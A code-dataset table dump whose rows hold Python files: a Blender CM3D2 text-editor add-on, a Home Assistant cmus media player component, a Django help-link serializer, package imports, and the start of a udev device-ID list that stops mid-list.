hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
485e47889cf0e06f86945cb9c271319ee0ab37ea | 6,749 | py | Python | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 22 | 2016-07-05T16:31:37.000Z | 2022-03-12T04:36:32.000Z | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 3 | 2020-06-07T01:25:47.000Z | 2020-11-20T12:45:49.000Z | CM3D2 Converter/misc_TEXT_HT_header.py | Algester/Blender-CM3D2-Converter | eb1df082ac72aa013dc996427bcee563b1fedaae | [
"Apache-2.0"
] | 9 | 2019-09-15T08:21:21.000Z | 2022-03-12T04:36:35.000Z | # 「テキストエディター」エリア → ヘッダー
import bpy
from . import common
from . import compat
# メニュー等に項目追加
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
@compat.BlRegister()
| 37.494444 | 119 | 0.610016 | # 「テキストエディター」エリア → ヘッダー
import bpy
from . import common
from . import compat
# メニュー等に項目追加
def menu_func(self, context):
texts = bpy.data.texts
text_keys = texts.keys()
self.layout.label(text="CM3D2用:", icon_value=common.kiss_icon())
row = self.layout.row(align=True)
if 'BoneData' in text_keys:
txt = bpy.data.texts['BoneData']
line_count = 0
for line in txt.as_string().split('\n'):
if line:
line_count += 1
row.operator('text.show_text', icon='ARMATURE_DATA', text="BoneData (%d)" % line_count).name = 'BoneData'
if 'LocalBoneData' in text_keys:
txt = bpy.data.texts['LocalBoneData']
line_count = 0
for line in txt.as_string().split('\n'):
if line:
line_count += 1
row.operator('text.show_text', icon='BONE_DATA', text="LocalBoneData (%d)" % line_count).name = 'LocalBoneData'
if 'BoneData' in text_keys and 'LocalBoneData' in text_keys:
if 'BoneData' in texts:
if 'BaseBone' not in texts['BoneData']:
texts['BoneData']['BaseBone'] = ""
row.prop(texts['BoneData'], '["BaseBone"]', text="")
row.operator('text.copy_text_bone_data', icon='COPYDOWN', text="")
row.operator('text.paste_text_bone_data', icon='PASTEDOWN', text="")
if "Material:0" in text_keys:
self.layout.label(text="", icon='MATERIAL_DATA')
row = self.layout.row(align=True)
pass_count = 0
for i in range(99):
name = "Material:" + str(i)
if name in text_keys:
sub_row = row.row(align=True)
sub_row.scale_x = 0.5
sub_row.operator('text.show_text', text=str(i)).name = name
else:
pass_count += 1
if 9 < pass_count:
break
if "Material:0" in text_keys:
row.operator('text.remove_all_material_texts', icon='X', text="")
@compat.BlRegister()
class CNV_OT_show_text(bpy.types.Operator):
bl_idname = 'text.show_text'
bl_label = "テキストを表示"
bl_description = "指定したテキストをこの領域に表示します"
bl_options = {'REGISTER', 'UNDO'}
name = bpy.props.StringProperty(name="テキスト名")
@classmethod
def poll(cls, context):
return hasattr(context.space_data, 'text')
def execute(self, context):
context.space_data.text = bpy.data.texts[self.name]
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_copy_text_bone_data(bpy.types.Operator):
bl_idname = 'text.copy_text_bone_data'
bl_label = "テキストのボーン情報をコピー"
bl_description = "テキストのボーン情報をカスタムプロパティへ貼付ける形にしてクリップボードにコピーします"
bl_options = {'REGISTER', 'UNDO'}
@classmethod
def poll(cls, context):
texts = context.blend_data.texts
return 'BoneData' in texts and 'LocalBoneData' in texts
def execute(self, context):
output_text = ""
if 'BaseBone' in context.blend_data.texts['BoneData']:
output_text += "BaseBone:" + context.blend_data.texts['BoneData']['BaseBone'] + "\n"
for line in context.blend_data.texts['BoneData'].as_string().split('\n'):
if not line:
continue
output_text += "BoneData:" + line + "\n"
for line in context.blend_data.texts['LocalBoneData'].as_string().split('\n'):
if not line:
continue
output_text += "LocalBoneData:" + line + "\n"
context.window_manager.clipboard = output_text
self.report(type={'INFO'}, message="ボーン情報をクリップボードにコピーしました")
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_paste_text_bone_data(bpy.types.Operator):
bl_idname = 'text.paste_text_bone_data'
bl_label = "テキストのボーン情報を貼付け"
bl_description = "クリップボード内のボーン情報をテキストデータに貼付けます"
bl_options = {'REGISTER', 'UNDO'}
@classmethod
def poll(cls, context):
clipboard = context.window_manager.clipboard
return "BoneData:" in clipboard and "LocalBoneData:" in clipboard
def execute(self, context):
if "BoneData" in context.blend_data.texts:
bone_data_text = context.blend_data.texts["BoneData"]
bone_data_text.clear()
else:
bone_data_text = context.blend_data.texts.new("BoneData")
if "LocalBoneData" in context.blend_data.texts:
local_bone_data_text = context.blend_data.texts["LocalBoneData"]
local_bone_data_text.clear()
else:
local_bone_data_text = context.blend_data.texts.new("LocalBoneData")
clipboard = context.window_manager.clipboard
for line in clipboard.split("\n"):
if line.startswith('BaseBone:'):
info = line[9:] # len('BaseData:') == 9
bone_data_text['BaseBone'] = info
local_bone_data_text['BaseBone'] = info
continue
if line.startswith('BoneData:'):
if line.count(',') >= 4:
bone_data_text.write(line[9:] + "\n") # len('BoneData:') == 9
continue
if line.startswith('LocalBoneData:'):
if line.count(',') == 1:
local_bone_data_text.write(line[14:] + "\n") # len('LocalBoneData:') == 14
bone_data_text.current_line_index = 0
local_bone_data_text.current_line_index = 0
self.report(type={'INFO'}, message="ボーン情報をクリップボードから貼付けました")
return {'FINISHED'}
@compat.BlRegister()
class CNV_OT_remove_all_material_texts(bpy.types.Operator):
bl_idname = 'text.remove_all_material_texts'
bl_label = "マテリアル情報テキストを全削除"
bl_description = "CM3D2で使用できるマテリアルテキストを全て削除します"
bl_options = {'REGISTER', 'UNDO'}
is_keep_used_material = bpy.props.BoolProperty(name="使用する分は保管", default=True)
@classmethod
def poll(cls, context):
return "Material:0" in context.blend_data.texts
def invoke(self, context, event):
return context.window_manager.invoke_props_dialog(self)
def draw(self, context):
self.layout.prop(self, 'is_keep_used_material')
def execute(self, context):
remove_texts = []
pass_count = 0
for i in range(9999):
name = "Material:" + str(i)
if name in context.blend_data.texts:
remove_texts.append(context.blend_data.texts[name])
else:
pass_count += 1
if 10 < pass_count:
break
if self.is_keep_used_material:
ob = context.active_object
if ob:
remove_texts = remove_texts[len(ob.material_slots):]
for txt in remove_texts:
context.blend_data.texts.remove(txt)
return {'FINISHED'}
| 5,287 | 1,606 | 110 |
43589412bf6bbd0b8acf7e3f218cda6cdcadc108 | 116 | py | Python | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | app/util/__init__.py | DrunkenPandaFans/dj-panda | a3e0afa5edc9910299d46f167bf01abfb8ab1d0c | [
"MIT"
] | null | null | null | from loader import Loader
from metadataloader import WrongHeaderException
from metadataloader import MetaDataLoader
| 29 | 47 | 0.896552 | from loader import Loader
from metadataloader import WrongHeaderException
from metadataloader import MetaDataLoader
| 0 | 0 | 0 |
136d26974fe8ec6f8b20b7bb62924a94c94b870e | 6,952 | py | Python | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 2 | 2017-02-25T00:27:06.000Z | 2017-02-25T03:09:30.000Z | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 1 | 2017-03-10T22:17:06.000Z | 2017-03-10T22:17:06.000Z | homeassistant/components/media_player/cmus.py | shire210/home-assistant | 63cd8bbee6f1b74ae9c6c249ac820119a8a573d8 | [
"Apache-2.0"
] | 2 | 2018-06-03T11:14:44.000Z | 2018-11-04T18:18:12.000Z | """
Support for interacting with and controlling the cmus music player.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.cmus/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_PLAY,
SUPPORT_VOLUME_SET, SUPPORT_PLAY_MEDIA, SUPPORT_SEEK, PLATFORM_SCHEMA,
MediaPlayerDevice)
from homeassistant.const import (
STATE_OFF, STATE_PAUSED, STATE_PLAYING, CONF_HOST, CONF_NAME, CONF_PORT,
CONF_PASSWORD)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pycmus==0.1.0']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'cmus'
DEFAULT_PORT = 3000
SUPPORT_CMUS = SUPPORT_PAUSE | SUPPORT_VOLUME_SET | SUPPORT_TURN_OFF | \
SUPPORT_TURN_ON | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_PLAY_MEDIA | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Inclusive(CONF_HOST, 'remote'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'remote'): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discover_info=None):
"""Setup the CMUS platform."""
from pycmus import exceptions
host = config.get(CONF_HOST)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
try:
cmus_remote = CmusDevice(host, password, port, name)
except exceptions.InvalidPassword:
_LOGGER.error("The provided password was rejected by cmus")
return False
add_devices([cmus_remote])
class CmusDevice(MediaPlayerDevice):
"""Representation of a running cmus."""
# pylint: disable=no-member
def __init__(self, server, password, port, name):
"""Initialize the CMUS device."""
from pycmus import remote
if server:
self.cmus = remote.PyCmus(
server=server, password=password, port=port)
auto_name = 'cmus-{}'.format(server)
else:
self.cmus = remote.PyCmus()
auto_name = 'cmus-local'
self._name = name or auto_name
self.status = {}
self.update()
def update(self):
"""Get the latest data and update the state."""
status = self.cmus.get_status_dict()
if not status:
_LOGGER.warning("Recieved no status from cmus")
else:
self.status = status
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the media state."""
if self.status.get('status') == 'playing':
return STATE_PLAYING
elif self.status.get('status') == 'paused':
return STATE_PAUSED
else:
return STATE_OFF
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.status.get('file')
@property
def content_type(self):
"""Content type of the current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self.status.get('duration')
@property
def media_title(self):
"""Title of current playing media."""
return self.status['tag'].get('title')
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self.status['tag'].get('artist')
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return self.status['tag'].get('tracknumber')
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return self.status['tag'].get('album')
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return self.status['tag'].get('albumartist')
@property
def volume_level(self):
"""Return the volume level."""
left = self.status['set'].get('vol_left')[0]
right = self.status['set'].get('vol_right')[0]
if left != right:
volume = float(left + right) / 2
else:
volume = left
return int(volume)/100
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_CMUS
def turn_off(self):
"""Service to send the CMUS the command to stop playing."""
self.cmus.player_stop()
def turn_on(self):
"""Service to send the CMUS the command to start playing."""
self.cmus.player_play()
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self.cmus.set_volume(int(volume * 100))
def volume_up(self):
"""Function to send CMUS the command for volume up."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) + 5)
def volume_down(self):
"""Function to send CMUS the command for volume down."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) - 5)
def play_media(self, media_type, media_id, **kwargs):
"""Send the play command."""
if media_type in [MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST]:
self.cmus.player_play_file(media_id)
else:
_LOGGER.error(
"Invalid media type %s. Only %s and %s are supported",
media_type, MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST)
def media_pause(self):
"""Send the pause command."""
self.cmus.player_pause()
def media_next_track(self):
"""Send next track command."""
self.cmus.player_next()
def media_previous_track(self):
"""Send next track command."""
self.cmus.player_prev()
def media_seek(self, position):
"""Send seek command."""
self.cmus.seek(position)
def media_play(self):
"""Send the play command."""
self.cmus.player_play()
def media_stop(self):
"""Send the stop command."""
self.cmus.stop()
| 31.035714 | 77 | 0.631617 | """
Support for interacting with and controlling the cmus music player.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.cmus/
"""
import logging
import voluptuous as vol
from homeassistant.components.media_player import (
MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_PREVIOUS_TRACK, SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_PLAY,
SUPPORT_VOLUME_SET, SUPPORT_PLAY_MEDIA, SUPPORT_SEEK, PLATFORM_SCHEMA,
MediaPlayerDevice)
from homeassistant.const import (
STATE_OFF, STATE_PAUSED, STATE_PLAYING, CONF_HOST, CONF_NAME, CONF_PORT,
CONF_PASSWORD)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pycmus==0.1.0']
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'cmus'
DEFAULT_PORT = 3000
SUPPORT_CMUS = SUPPORT_PAUSE | SUPPORT_VOLUME_SET | SUPPORT_TURN_OFF | \
SUPPORT_TURN_ON | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_PLAY_MEDIA | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Inclusive(CONF_HOST, 'remote'): cv.string,
vol.Inclusive(CONF_PASSWORD, 'remote'): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
def setup_platform(hass, config, add_devices, discover_info=None):
"""Setup the CMUS platform."""
from pycmus import exceptions
host = config.get(CONF_HOST)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
name = config.get(CONF_NAME)
try:
cmus_remote = CmusDevice(host, password, port, name)
except exceptions.InvalidPassword:
_LOGGER.error("The provided password was rejected by cmus")
return False
add_devices([cmus_remote])
class CmusDevice(MediaPlayerDevice):
"""Representation of a running cmus."""
# pylint: disable=no-member
def __init__(self, server, password, port, name):
"""Initialize the CMUS device."""
from pycmus import remote
if server:
self.cmus = remote.PyCmus(
server=server, password=password, port=port)
auto_name = 'cmus-{}'.format(server)
else:
self.cmus = remote.PyCmus()
auto_name = 'cmus-local'
self._name = name or auto_name
self.status = {}
self.update()
def update(self):
"""Get the latest data and update the state."""
status = self.cmus.get_status_dict()
if not status:
_LOGGER.warning("Recieved no status from cmus")
else:
self.status = status
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the media state."""
if self.status.get('status') == 'playing':
return STATE_PLAYING
elif self.status.get('status') == 'paused':
return STATE_PAUSED
else:
return STATE_OFF
@property
def media_content_id(self):
"""Content ID of current playing media."""
return self.status.get('file')
@property
def content_type(self):
"""Content type of the current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self.status.get('duration')
@property
def media_title(self):
"""Title of current playing media."""
return self.status['tag'].get('title')
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self.status['tag'].get('artist')
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return self.status['tag'].get('tracknumber')
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return self.status['tag'].get('album')
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return self.status['tag'].get('albumartist')
@property
def volume_level(self):
"""Return the volume level."""
left = self.status['set'].get('vol_left')[0]
right = self.status['set'].get('vol_right')[0]
if left != right:
volume = float(left + right) / 2
else:
volume = left
return int(volume)/100
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_CMUS
def turn_off(self):
"""Service to send the CMUS the command to stop playing."""
self.cmus.player_stop()
def turn_on(self):
"""Service to send the CMUS the command to start playing."""
self.cmus.player_play()
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self.cmus.set_volume(int(volume * 100))
def volume_up(self):
"""Function to send CMUS the command for volume up."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) + 5)
def volume_down(self):
"""Function to send CMUS the command for volume down."""
left = self.status['set'].get('vol_left')
right = self.status['set'].get('vol_right')
if left != right:
current_volume = float(left + right) / 2
else:
current_volume = left
if current_volume <= 100:
self.cmus.set_volume(int(current_volume) - 5)
def play_media(self, media_type, media_id, **kwargs):
"""Send the play command."""
if media_type in [MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST]:
self.cmus.player_play_file(media_id)
else:
_LOGGER.error(
"Invalid media type %s. Only %s and %s are supported",
media_type, MEDIA_TYPE_MUSIC, MEDIA_TYPE_PLAYLIST)
def media_pause(self):
"""Send the pause command."""
self.cmus.player_pause()
def media_next_track(self):
"""Send next track command."""
self.cmus.player_next()
def media_previous_track(self):
"""Send next track command."""
self.cmus.player_prev()
def media_seek(self, position):
"""Send seek command."""
self.cmus.seek(position)
def media_play(self):
"""Send the play command."""
self.cmus.player_play()
def media_stop(self):
"""Send the stop command."""
self.cmus.stop()
| 0 | 0 | 0 |
a3be5b5f50e1b1fb3f0cb8c0a060034c5377d0ef | 459 | py | Python | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v2/serializers/details/help_link.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models.template import HelpLink
| 24.157895 | 69 | 0.649237 | from rest_framework import serializers
from rest_framework.exceptions import ValidationError
from core.models.template import HelpLink
class HelpLinkSerializer(serializers.ModelSerializer):
def create(self, validated_data):
raise ValidationError("Cannot create new help links via API")
class Meta:
model = HelpLink
fields = (
'link_key',
'topic',
'context',
'href'
)
| 82 | 217 | 23 |
729bfaaaa4f5e69da4fae3b06567759718e758f5 | 238 | py | Python | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | 8 | 2018-06-20T23:20:43.000Z | 2020-01-12T01:32:06.000Z | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | null | null | null | code/utils/__init__.py | niuwk/infonets | 274e97c9a86144dd52cbe90caffff578a2f5d178 | [
"BSD-3-Clause"
] | 4 | 2018-06-26T20:28:13.000Z | 2021-06-17T13:39:56.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from .config import *
from .data import *
from .display import *
from .helper import *
from .methods import *
from .misc import *
from .whiten import *
| 19.833333 | 82 | 0.768908 | from __future__ import absolute_import, division, print_function, unicode_literals
from .config import *
from .data import *
from .display import *
from .helper import *
from .methods import *
from .misc import *
from .whiten import *
| 0 | 0 | 0 |
0ae15f7dfa871a72cf29d7ba864765e0b6e824d0 | 5,906 | py | Python | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 122 | 2015-10-25T18:03:01.000Z | 2022-03-22T23:32:51.000Z | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 36 | 2015-10-25T12:40:37.000Z | 2022-02-13T20:39:16.000Z | generate_rules.py | denilsonsa/udev-not-joystick | 030ee83f50c0ffb10becf7a3afa847fef3bf810b | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 41 | 2015-10-28T04:34:07.000Z | 2021-12-19T23:51:41.000Z | #!/usr/bin/env python3
import os.path
import textwrap
# List of tuples ('idVendor', 'idProduct'), as four hexadecimal digits.
DEVICES = [
# Microsoft Microsoft Wireless Optical Desktop® 2.10
# Microsoft Wireless Desktop - Comfort Edition
('045e', '009d'),
# Microsoft Microsoft® Digital Media Pro Keyboard
# Microsoft Corp. Digital Media Pro Keyboard
('045e', '00b0'),
# Microsoft Microsoft® Digital Media Keyboard
# Microsoft Corp. Digital Media Keyboard 1.0A
('045e', '00b4'),
# Microsoft Microsoft® Digital Media Keyboard 3000
('045e', '0730'),
# Microsoft Microsoft® 2.4GHz Transceiver v6.0
# Microsoft Microsoft® 2.4GHz Transceiver v8.0
# Microsoft Corp. Nano Transceiver v1.0 for Bluetooth
# Microsoft Wireless Mobile Mouse 1000
# Microsoft Wireless Desktop 3000
('045e', '0745'),
# Microsoft® SideWinder(TM) 2.4GHz Transceiver
('045e', '0748'),
# Microsoft Corp. Wired Keyboard 600
('045e', '0750'),
# Microsoft Corp. Sidewinder X4 keyboard
('045e', '0768'),
# Microsoft Corp. Arc Touch Mouse Transceiver
('045e', '0773'),
# Microsoft® 2.4GHz Transceiver v9.0
# Microsoft® Nano Transceiver v2.1
# Microsoft Sculpt Ergonomic Keyboard (5KV-00001)
('045e', '07a5'),
# Microsoft® Nano Transceiver v1.0
# Microsoft Wireless Keyboard 800
('045e', '07b2'),
# Microsoft® Nano Transceiver v2.0
('045e', '0800'),
('046d', 'c30a'), # Logitech, Inc. iTouch Composite keboard
('04d9', 'a0df'), # Tek Syndicate Mouse (E-Signal USB Gaming Mouse)
# List of Wacom devices at: http://linuxwacom.sourceforge.net/wiki/index.php/Device_IDs
('056a', '0010'), # Wacom ET-0405 Graphire
('056a', '0011'), # Wacom ET-0405A Graphire2 (4x5)
('056a', '0012'), # Wacom ET-0507A Graphire2 (5x7)
('056a', '0013'), # Wacom CTE-430 Graphire3 (4x5)
('056a', '0014'), # Wacom CTE-630 Graphire3 (6x8)
('056a', '0015'), # Wacom CTE-440 Graphire4 (4x5)
('056a', '0016'), # Wacom CTE-640 Graphire4 (6x8)
('056a', '0017'), # Wacom CTE-450 Bamboo Fun (4x5)
('056a', '0018'), # Wacom CTE-650 Bamboo Fun 6x8
('056a', '0019'), # Wacom CTE-631 Bamboo One
('056a', '00d1'), # Wacom Bamboo Pen and Touch CTH-460
('056a', '030e'), # Wacom Intuos Pen (S) CTL-480
('09da', '054f'), # A4 Tech Co., G7 750 mouse
('09da', '1410'), # A4 Tech Co., Ltd Bloody AL9 mouse
('09da', '3043'), # A4 Tech Co., Ltd Bloody R8A Gaming Mouse
('09da', '31b5'), # A4 Tech Co., Ltd Bloody TL80 Terminator Laser Gaming Mouse
('09da', '3997'), # A4 Tech Co., Ltd Bloody RT7 Terminator Wireless
('09da', '3f8b'), # A4 Tech Co., Ltd Bloody V8 mouse
('09da', '51f4'), # Modecom MC-5006 Keyboard
('09da', '5589'), # A4 Tech Co., Ltd Terminator TL9 Laser Gaming Mouse
('09da', '7b22'), # A4 Tech Co., Ltd Bloody V5
('09da', '7f2d'), # A4 Tech Co., Ltd Bloody R3 mouse
('09da', '8090'), # A4 Tech Co., Ltd X-718BK Oscar Optical Gaming Mouse
('09da', '9033'), # A4 Tech Co., X7 X-705K
('09da', '9066'), # A4 Tech Co., Sharkoon Fireglider Optical
('09da', '9090'), # A4 Tech Co., Ltd XL-730K / XL-750BK / XL-755BK Laser Mouse
('09da', '90c0'), # A4 Tech Co., Ltd X7 G800V keyboard
('09da', 'f012'), # A4 Tech Co., Ltd Bloody V7 mouse
('09da', 'f32a'), # A4 Tech Co., Ltd Bloody B540 keyboard
('09da', 'f613'), # A4 Tech Co., Ltd Bloody V2 mouse
('09da', 'f624'), # A4 Tech Co., Ltd Bloody B120 Keyboard
('1b1c', '1b3c'), # Corsair Harpoon RGB gaming mouse
('1d57', 'ad03'), # [T3] 2.4GHz and IR Air Mouse Remote Control
('1e7d', '2e4a'), # Roccat Tyon Mouse
('20a0', '422d'), # Winkeyless.kr Keyboards
('2516', '001f'), # Cooler Master Storm Mizar Mouse
('2516', '0028'), # Cooler Master Storm Alcor Mouse
]
if __name__ == '__main__':
main()
| 41.886525 | 186 | 0.629529 | #!/usr/bin/env python3
import os.path
import textwrap
# List of tuples ('idVendor', 'idProduct'), as four hexadecimal digits.
DEVICES = [
# Microsoft Microsoft Wireless Optical Desktop® 2.10
# Microsoft Wireless Desktop - Comfort Edition
('045e', '009d'),
# Microsoft Microsoft® Digital Media Pro Keyboard
# Microsoft Corp. Digital Media Pro Keyboard
('045e', '00b0'),
# Microsoft Microsoft® Digital Media Keyboard
# Microsoft Corp. Digital Media Keyboard 1.0A
('045e', '00b4'),
# Microsoft Microsoft® Digital Media Keyboard 3000
('045e', '0730'),
# Microsoft Microsoft® 2.4GHz Transceiver v6.0
# Microsoft Microsoft® 2.4GHz Transceiver v8.0
# Microsoft Corp. Nano Transceiver v1.0 for Bluetooth
# Microsoft Wireless Mobile Mouse 1000
# Microsoft Wireless Desktop 3000
('045e', '0745'),
# Microsoft® SideWinder(TM) 2.4GHz Transceiver
('045e', '0748'),
# Microsoft Corp. Wired Keyboard 600
('045e', '0750'),
# Microsoft Corp. Sidewinder X4 keyboard
('045e', '0768'),
# Microsoft Corp. Arc Touch Mouse Transceiver
('045e', '0773'),
# Microsoft® 2.4GHz Transceiver v9.0
# Microsoft® Nano Transceiver v2.1
# Microsoft Sculpt Ergonomic Keyboard (5KV-00001)
('045e', '07a5'),
# Microsoft® Nano Transceiver v1.0
# Microsoft Wireless Keyboard 800
('045e', '07b2'),
# Microsoft® Nano Transceiver v2.0
('045e', '0800'),
('046d', 'c30a'), # Logitech, Inc. iTouch Composite keboard
('04d9', 'a0df'), # Tek Syndicate Mouse (E-Signal USB Gaming Mouse)
# List of Wacom devices at: http://linuxwacom.sourceforge.net/wiki/index.php/Device_IDs
('056a', '0010'), # Wacom ET-0405 Graphire
('056a', '0011'), # Wacom ET-0405A Graphire2 (4x5)
('056a', '0012'), # Wacom ET-0507A Graphire2 (5x7)
('056a', '0013'), # Wacom CTE-430 Graphire3 (4x5)
('056a', '0014'), # Wacom CTE-630 Graphire3 (6x8)
('056a', '0015'), # Wacom CTE-440 Graphire4 (4x5)
('056a', '0016'), # Wacom CTE-640 Graphire4 (6x8)
('056a', '0017'), # Wacom CTE-450 Bamboo Fun (4x5)
('056a', '0018'), # Wacom CTE-650 Bamboo Fun 6x8
('056a', '0019'), # Wacom CTE-631 Bamboo One
('056a', '00d1'), # Wacom Bamboo Pen and Touch CTH-460
('056a', '030e'), # Wacom Intuos Pen (S) CTL-480
('09da', '054f'), # A4 Tech Co., G7 750 mouse
('09da', '1410'), # A4 Tech Co., Ltd Bloody AL9 mouse
('09da', '3043'), # A4 Tech Co., Ltd Bloody R8A Gaming Mouse
('09da', '31b5'), # A4 Tech Co., Ltd Bloody TL80 Terminator Laser Gaming Mouse
('09da', '3997'), # A4 Tech Co., Ltd Bloody RT7 Terminator Wireless
('09da', '3f8b'), # A4 Tech Co., Ltd Bloody V8 mouse
('09da', '51f4'), # Modecom MC-5006 Keyboard
('09da', '5589'), # A4 Tech Co., Ltd Terminator TL9 Laser Gaming Mouse
('09da', '7b22'), # A4 Tech Co., Ltd Bloody V5
('09da', '7f2d'), # A4 Tech Co., Ltd Bloody R3 mouse
